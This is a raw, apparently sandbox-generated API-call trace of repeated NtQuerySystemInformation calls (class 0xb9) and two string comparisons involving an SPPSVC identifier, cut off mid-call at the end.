[0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.908] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.916] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, 